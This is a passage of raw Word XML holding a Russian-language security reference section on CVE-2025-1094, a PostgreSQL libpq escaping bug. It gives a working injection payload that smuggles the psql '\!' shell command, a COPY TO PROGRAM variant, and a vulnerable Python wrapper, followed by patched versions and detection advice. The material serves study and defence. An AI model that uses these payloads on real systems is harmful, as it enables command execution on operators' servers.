          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MULE_INTERNAL</w:t>
      </w:r>
      <w:r>
        <w:t>: байты, корректные в одной кодировке, в другой разбираются иначе, и escape ломается.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAA003B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Минимальный payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D7B000" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hax\xC0'; \! id #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7487BE4C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Где:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169C62B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hax</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — безобидный префикс.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08830E86" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\xC0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — байт-затравка, ломающий escape.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D0E593" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — закрывающая кавычка целевого литерала, которая прошла без замены.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37040967" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\! id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>psql meta-command</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, не SQL. Когда escape-результат подаётся в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>psql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как stdin, psql интерпретирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как execute-shell-команду — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> исполняется как ОС-команда (от имени пользователя, под которым работает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>psql</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E97575" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — комментарий до конца строки в psql.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074BD676" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Эквивалентный chain через серверный SQL (если psql </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> блокирован, но stacked queries проходят): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'; COPY t TO PROGRAM 'id'; --</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это уже 3.7.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036F0EE3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Уязвимый паттерн</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569ADFC6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># обёртка вокруг psql, типичная для backup/migration-утилит</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E878972" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>import subprocess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B09E14" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from psycopg2.extensions import quote_ident, AsIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AD1992" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BAA147" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>table = request.args["table"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C9D85A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>escaped = quote_ident(table, connection)  # вызывает PQescapeIdentifier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617DD5B0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cmd = ["psql", "-d", "production", "-c", f"\\d {escaped}"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337BB318" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>subprocess.run(cmd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B925BF6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>table = "x\xC0\"; \\! id #"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — escape вернёт строку, в которой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\xC0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-байт нарушил замыкание </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>psql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> исполнит meta-command </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\!</w:t>
      </w:r>
      <w:r>
        <w:t>, получив shell на сервере оператора.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DEC7B5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Реальные продукты, где это эксплуатировалось, и chain-detail — в 4.5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A02E58" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Почему это попадает в 3.9 (а не в 3.6 / 3.7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1E934C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Категория 3.9 — про </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>обход санитизации</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. CVE-2025-1094 — это баг в самой санитизации, officially recommended PG-методе. То есть атакующий не обходит фильтр </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>в обход</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> правильного API; он эксплуатирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>сам</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API. Этим CVE-2025-1094 отличается от классических 3.9.1–3.9.6, где приёмы — про переписывание payload в форму, которую фильтр пропускает; здесь фильтр (PQescape*) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>сам</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> превращает безопасную строку в инъекционную.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4905C6B1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>С точки зрения позиционирования: 3.9 говорит «вот лексические/encoding-приёмы, обходящие input-фильтр». CVE-2025-1094 — самая extreme форма этого класса: encoding-приём, против которого штатный escape-механизм бессилен.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA44658" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Что важно знать сейчас</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222B9A34" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1) Уязвимы только цепочки через `psql` (или libpq-call → psql).</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Сам PG-сервер этим багом не затронут. Если приложение строит SQL через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PQescape*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и сразу шлёт его серверу через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PQexec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — серверный парсер увидит невалидный UTF-8 и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>отвергнет</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> запрос с ошибкой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>invalid byte sequence for encoding "UTF8"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (см. PG Error Codes 22021). Атака работает только когда payload проходит через psql-stage, где meta-commands </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\copy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> дают shell-уровень доступа на клиентской машине.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC776A8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2) Не уязвимы Django / SQLAlchemy / asyncpg в обычной конфигурации.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Эти стэки используют либо параметризацию (server-side prepared statements), либо собственные quote-функции (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>psycopg2.extensions.adapt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>asyncpg.Connection.set_type_codec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), которые не идут через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PQescape*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или идут, но результат подаётся в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PQexec</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, а не в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>psql</w:t>
      </w:r>
      <w:r>
        <w:t>. Целевые жертвы — backup-обёртки, admin-CLI, migration-утилиты (конкретные продукты — в 4.5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68200CF4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3) Patch-окно.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Уязвимы все psql/libpq </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>до 17.3, 16.7, 15.11, 14.16, 13.19</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (релиз 13 февраля 2025). Версия psql — самостоятельный фактор: даже если PG-сервер 17.4, но psql на машине оператора всё ещё 17.2 — chain работает. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Проверка: `psql --version` на каждом хосте, где psql установлен.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309DEBA5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Связанные паттерны</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3565EE36" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.1 (COPY FROM/TO PROGRAM)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — типичная эскалация после получения SQL injection: вместо клиентского </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — серверный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>COPY TO PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22705C38" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9.4 (E-strings)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — близкая лексическая тематика, но другая семантика: E-strings — официальная фича PG для escape, без багов; CVE-2025-1094 — баг в client-side escape API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8E9893" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.5 (Хронология 2025)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — полный разбор: CVSS, disclosure timeline, цепочка с CVE-2024-12356, patch-окно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38801D23" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.7 (Цепочки)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — CVE-2025-1094 → COPY TO PROGRAM (R21).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EAAA79" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>rules.py в DS-workshop2.0 — не покрыто и не должно быть:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CVE-2025-1094 — баг </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>клиентской библиотеки</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, не серверного SQL. Серверный judge на основе rules.py его обнаружить не может (на момент срабатывания payload уже валиден). Детекция — на уровне статического анализа кода приложения (есть ли в коде </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>subprocess.run(["psql", ...])</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PQescape*</w:t>
      </w:r>
      <w:r>
        <w:t>?) или мониторинга версий libpq/psql на хостах.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369AA6DE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Источники</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6600745A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0563C1"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PostgreSQL advisory: CVE-2025-1094</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — версии fix. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(R6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7C9B81" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
